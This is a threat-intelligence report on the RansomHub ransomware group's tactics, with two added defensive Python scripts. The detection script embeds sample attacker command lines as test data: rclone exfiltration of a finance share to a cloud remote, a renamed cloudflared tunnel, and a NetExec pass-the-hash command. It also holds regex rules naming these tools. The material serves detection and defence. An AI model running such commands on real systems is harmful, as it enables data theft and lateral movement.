Prepared by: Richard Grainger, Global Head of Digital Forensics
A ransomware group that emerged in 2024 has been operating inside Australian and New Zealand networks for an average of 69 days before detection, quietly mapping environments, identifying backup weaknesses, and stealing sensitive data before pulling the trigger on encryption. RansomHub, a financially motivated threat actor operating under a ransomware-as-a-service (RaaS) model, targeted organisations across healthcare, finance, manufacturing, education, and government. Triskele Labs conducted direct incident response to eight RansomHub-related intrusions, providing first-hand insight into how affiliates operate, and what defenders can do to close the gaps they exploit.
Who is RansomHub?
RansomHub is a financially motivated ransomware group that emerged in 2024 and operates under a ransomware-as-a-service (RaaS) model — meaning the group develops and maintains the ransomware platform while independent affiliates carry out the actual intrusions in exchange for a share of ransom payments.
They are known for aggressive double extortion: affiliates both encrypt victim environments and exfiltrate sensitive data, then use a dark web leak site to pressure organisations into paying. Those that do not comply face public exposure of their stolen information.
RansomHub primarily targets enterprise Windows environments and has affected organisations across a broad range of sectors, including healthcare, finance, manufacturing, education, and government.
Triskele Labs has conducted direct response to eight RansomHub-related incidents, providing first-hand insight into the group’s operational behaviour.
RansomHub’s activity across Triskele Labs investigations shows a consistent pattern of deliberate compromise designed to maximise leverage.
RansomHub affiliates exfiltrate sensitive data while also encrypting systems. This enables them to pressure victims with both operational disruption and the threat of publishing stolen information.
One defining characteristic observed is an extended dwell time. On average, RansomHub affiliates maintained access to compromised networks for 69 days before detection or encryption. This long access window enables thorough reconnaissance and significantly increases the blast radius when ransomware is finally deployed.
Affiliates pay special attention to identifying how backup systems operate and where backup coverage is weak. This allows them to deliberately target recovery pathways, reducing a victim’s ability to restore without paying.
Rather than deploying custom malware, affiliates use legitimate administrative tools already present in the environment for movement and execution. This reduces detection opportunities, as the activity can blend in with normal IT operations.
Data exfiltration is commonly performed using Rclone — a command-line tool originally designed for syncing files to cloud storage services such as Dropbox, Google Drive, and OneDrive. Affiliates repurpose it to quietly transfer stolen data out of the network. The group also employs a distributed, multi-layer command-and-control (C2) infrastructure and uses anonymisation techniques such as VPNs, compromised third-party services, and tunnelling via Cloudflared — a tool from Cloudflare that creates encrypted tunnels, used here to maintain persistent, hidden access into compromised environments. Tools like Netexec — a network execution framework used to authenticate and run commands across systems at scale — have also been observed in use across engagements.
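As an added illustration of how the tooling above can be spotted (this is not Triskele Labs code, and the patterns are not indicators taken from the engagements on this page), the following Python script applies the detection idea to process-creation telemetry. It matches tool-specific command-line syntax rather than binary names, so a renamed rclone or cloudflared binary is still caught, and it separately flags the 32-character NTLM hash argument that NetExec accepts for pass-the-hash. The sample events, host names, paths and token are constructed for the example, the field layout is a simplified Sysmon Event ID 1, and the ATT&CK ID used for tunnelling (T1572) is not part of the page's own mapping.

```python
"""Flag Rclone, Cloudflared and NetExec usage in process-creation events.

Added example; not Triskele Labs code and not IOCs from real engagements.
Events are constructed in a simplified Sysmon Event ID 1 layout:
host, user, image path, command line (tab-separated).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample telemetry (hosts, users, paths and the token are invented).
SAMPLE_EVENTS = (
    "FS01\tCORP\\svc_backup\tC:\\Windows\\System32\\svchost.exe\tsvchost.exe -k netsvcs\n"
    "FS01\tCORP\\jsmith\tC:\\Users\\Public\\rclone.exe\t"
    "rclone.exe copy D:\\Finance mega:staging --transfers 32 --config C:\\Users\\Public\\rc.conf\n"
    "DC01\tCORP\\adm_ops\tC:\\ProgramData\\svchost.exe\tsvchost.exe tunnel run --token eyJhIjoiYWJj\n"
    "WS22\tCORP\\jsmith\tC:\\Tools\\nxc.exe\tnxc smb 10.10.0.0/24 -u adm_ops -H aad3b435b51404eeaad3b435b51404ee\n"
    "WS22\tCORP\\jsmith\tC:\\Program Files\\7-Zip\\7z.exe\t7z a -p C:\\Temp\\stage.7z D:\\HR\n"
)


@dataclass
class Rule:
    name: str
    technique: str
    expected_image: Optional[str]   # file name the tool normally ships as (None = not binary-specific)
    cmdline: "re.Pattern"           # tool-specific syntax; matched even when the binary is renamed


RULES: List[Rule] = [
    # rclone sub-command followed by a "remote:path" target; {2,} avoids Windows drive letters like D:
    Rule("Rclone exfiltration", "T1567.002", "rclone.exe",
         re.compile(r"\b(copy|sync|move|copyto|moveto)\b.*\s[A-Za-z0-9_-]{2,}:[^\s]*", re.I)),
    # cloudflared tunnel start-up, or a tunnel token (JWT-style, starts with eyJ)
    Rule("Cloudflared tunnel", "T1572", "cloudflared.exe",
         re.compile(r"\btunnel\s+run\b|--token\s+eyJ", re.I)),
    # NetExec (nxc, formerly CrackMapExec) protocol sub-commands
    Rule("NetExec lateral movement", "T1021.002", "nxc.exe",
         re.compile(r"\b(nxc|netexec|cme|crackmapexec)(\.exe)?\s+(smb|winrm|rdp|ldap|ssh|mssql)\b", re.I)),
    # NTLM hash supplied with -H (case-sensitive: -h is help); catches PtH regardless of the tool
    Rule("Pass the Hash", "T1550.002", None,
         re.compile(r"(?:^|\s)-H\s+[0-9a-fA-F]{32}\b")),
]


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    technique: str
    image: str
    renamed: bool   # command line matched a tool, but the binary is not called what that tool is called


def parse_event(line: str) -> dict:
    host, user, image, cmdline = line.split("\t", 3)
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


def scan(events_text: str) -> List[Finding]:
    findings: List[Finding] = []
    for raw in events_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_event(raw)
        image_name = ev["image"].rsplit("\\", 1)[-1].lower()
        for rule in RULES:
            if not rule.cmdline.search(ev["cmdline"]):
                continue
            renamed = rule.expected_image is not None and image_name != rule.expected_image
            findings.append(Finding(ev["host"], ev["user"], rule.name, rule.technique, ev["image"], renamed))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        flag = " (renamed binary)" if f.renamed else ""
        print(f"{f.host} {f.user}: {f.rule} [{f.technique}] via {f.image}{flag}")
```

The `renamed` flag is what separates the interesting case here: cloudflared running as `svchost.exe` out of `C:\ProgramData` would pass a hash- or name-based blocklist but not a syntax match. Feeding this from Sysmon Event ID 1 or Windows 4688 requires command-line auditing to be enabled, otherwise the command-line field is empty and only the image name is available.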
In late March 2025, RansomHub abruptly ceased operations and removed their infrastructure from the dark web. Shortly thereafter, rival ransomware group DragonForce claimed that RansomHub had joined its platform, suggesting a shift toward a decentralised ransomware cartel model. This change fragmented RansomHub’s affiliate network, with some affiliates moving to other groups such as Qilin, while others appeared to disband entirely.
Since then, the group has remained largely silent, creating uncertainty about future activity. Organisations should continue monitoring for activity consistent with former RansomHub affiliates operating under new banners.
The following defensive actions align directly to behaviours observed across Triskele Labs RansomHub incident response engagements.
Reduce exposure to credentialed remote access pathways
RansomHub intrusions have involved VPN-based access using valid credentials, including both domain and local accounts. To reduce the likelihood of credentialed remote access being abused:
Audit VPN authentication and account hygiene, including local VPN accounts
Strengthen authentication controls for remote access, with a focus on preventing misuse of valid accounts
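The audit recommended above, written out as an added Python example (not Triskele Labs tooling) over a constructed VPN authentication log: it surfaces successful logins by local (non-domain) VPN accounts, successes from accounts or source addresses that have no baseline, and a success that follows a burst of failures from the same source, which is what a password spray or a stuffed credential looks like once it lands. The log format, account names, addresses, the baseline of known source IPs and the thresholds are all assumptions for the example; real VPN appliances log these fields under different names.

```python
"""Audit a VPN authentication log for credential-abuse signals.

Added example; not Triskele Labs tooling. The log is constructed in a simple
CSV layout (timestamp,user,realm,src_ip,result); realm LOCAL marks an account
defined on the VPN appliance itself rather than in the domain.
"""
import csv
import io
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Set

FAIL_THRESHOLD = 3               # failures from one (user, src_ip) ... (assumed threshold)
FAIL_WINDOW = timedelta(minutes=10)  # ... within this window before a success

# Constructed sample log; addresses are documentation ranges, names are invented.
VPN_LOG = """\
timestamp,user,realm,src_ip,result
2025-02-03T08:01:12Z,jsmith,CORP,203.0.113.10,SUCCESS
2025-02-03T08:05:40Z,adm_ops,CORP,203.0.113.10,SUCCESS
2025-02-03T23:41:02Z,vpn_vendor,LOCAL,198.51.100.77,SUCCESS
2025-02-04T02:10:01Z,adm_ops,CORP,192.0.2.55,FAILURE
2025-02-04T02:10:19Z,adm_ops,CORP,192.0.2.55,FAILURE
2025-02-04T02:10:37Z,adm_ops,CORP,192.0.2.55,FAILURE
2025-02-04T02:11:05Z,adm_ops,CORP,192.0.2.55,SUCCESS
2025-02-04T09:30:00Z,jsmith,CORP,203.0.113.10,SUCCESS
"""

# Assumed baseline: source IPs each account has historically used. Accounts
# missing from it have no history at all (e.g. a vendor account nobody owns).
KNOWN_SOURCES: Dict[str, Set[str]] = {
    "jsmith": {"203.0.113.10"},
    "adm_ops": {"203.0.113.10"},
}


@dataclass
class Finding:
    kind: str        # local_account | no_baseline | new_source | success_after_failures
    user: str
    realm: str
    src_ip: str
    timestamp: str


def audit_vpn_log(log_text: str, known_sources: Dict[str, Set[str]]) -> List[Finding]:
    findings: List[Finding] = []
    recent_failures: Dict[tuple, List[datetime]] = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        ts = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        key = (row["user"], row["src_ip"])
        if row["result"] != "SUCCESS":
            recent_failures[key].append(ts)
            continue

        # 1. Local VPN accounts sit outside domain password policy, MFA and offboarding.
        if row["realm"].upper() == "LOCAL":
            findings.append(Finding("local_account", row["user"], row["realm"], row["src_ip"], row["timestamp"]))

        # 2. Compare the source against what this account has used before.
        baseline = known_sources.get(row["user"])
        if baseline is None:
            findings.append(Finding("no_baseline", row["user"], row["realm"], row["src_ip"], row["timestamp"]))
        elif row["src_ip"] not in baseline:
            findings.append(Finding("new_source", row["user"], row["realm"], row["src_ip"], row["timestamp"]))

        # 3. A success preceded by repeated failures from the same source is a guessed credential.
        window_start = ts - FAIL_WINDOW
        fails = [t for t in recent_failures[key] if t >= window_start]
        if len(fails) >= FAIL_THRESHOLD:
            findings.append(Finding("success_after_failures", row["user"], row["realm"], row["src_ip"], row["timestamp"]))
        recent_failures[key].clear()
    return findings


if __name__ == "__main__":
    for f in audit_vpn_log(VPN_LOG, KNOWN_SOURCES):
        print(f"{f.timestamp} {f.kind:24} {f.realm}\\{f.user} from {f.src_ip}")
```

Two of the four findings land on the same event: `adm_ops` succeeding from an unseen address right after three failures from it. That combination, rather than either signal alone, is the one worth paging on; the `local_account` hit is the hygiene item, a vendor account that should either move into the domain with MFA or be removed.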
RansomHub is a financially motivated RaaS operation known for double extortion and a deliberate, patient approach to compromise. Across Triskele Labs investigations, affiliates demonstrated extended dwell time averaging 69 days, methodical reconnaissance, a strong focus on backup systems, and heavy reliance on legitimate tooling to blend into normal administrative activity. Exfiltration via Rclone and persistent access via Cloudflared-style tunnelling were recurring themes, alongside common defence evasion actions such as security tooling interference and Windows event log clearing.
In late March 2025, RansomHub ceased operations and removed its infrastructure from the dark web, followed by claims of alignment with DragonForce and fragmentation of the affiliate ecosystem. The group’s subsequent silence has created uncertainty around future activity.
MITRE ATT&CK Mapping
| Tactic | Technique | Description |
|---|---|---|
| Initial Access | T1133 – External Remote Services | VPN was used to remotely access the environment |
| Initial Access | T1078.002 – Valid Accounts: Domain Accounts | Valid domain credentials were used to gain access to the network |
| Initial Access | T1078.003 – Valid Accounts: Local Accounts | Local VPN accounts were used to gain access |
| Persistence | T1543.003 – Create or Modify System Process: Windows Service | A Windows service was created or modified |
| Discovery | T1046 – Network Service Discovery | Network services were scanned to identify active systems and open ports |
| Discovery | T1135 – Network Share Discovery | Systems were scanned to identify network shares |
| Discovery | T1087.002 – Account Discovery: Domain Account | Domain account information was collected |
| Lateral Movement | T1021.001 – Remote Services: Remote Desktop Protocol | RDP was used to move laterally within the environment |
| Defence Evasion | T1562.001 – Impair Defences: Disable or Modify Tools | Security tooling was disabled or modified |
| Defence Evasion | T1070.001 – Indicator Removal: Clear Windows Event Logs | Windows event logs were cleared to hide activity |
| Defence Evasion | T1550.002 – Use Alternate Authentication Material: Pass the Hash | Pass the Hash was used for some RDP connections |
| Collection | T1039 – Data from Network Shared Drive | Data was collected from network shares |
| Collection | T1074 – Data Staged | Data was staged centrally before exfiltration |
| Exfiltration | T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage | Data was uploaded to cloud storage |
| Impact | T1486 – Data Encrypted for Impact | Data was encrypted, rendering systems inoperable |
|
| Tool | Purpose |
|---|---|
| Cloudflared | Tunnelling tool used to bypass perimeter protections and establish resilient access |
| Rclone | Used for data exfiltration to cloud storage |
| Netexec | Used for lateral movement and credential validation |
| Anonymising infrastructure | VPNs and compromised third-party services used for obfuscation |
| Anti-analysis binaries | Payloads may include obfuscation and anti-debugging protections |
Qilin – https://www.triskelelabs.com/blog/qilin-on-the-rise-what-australian-organisations-need-to-know
State of Cyber: TA – https://www.stateofcyber.com.au/report/dfir#threat-actors-are-getting-smarter
Reinfection/persistence – https://www.triskelelabs.com/blog/how-threat-actors-regain-access-after-ransomware-attack
Kairos – https://www.triskelelabs.com/blog/kairos-changing-the-ransomware-playbook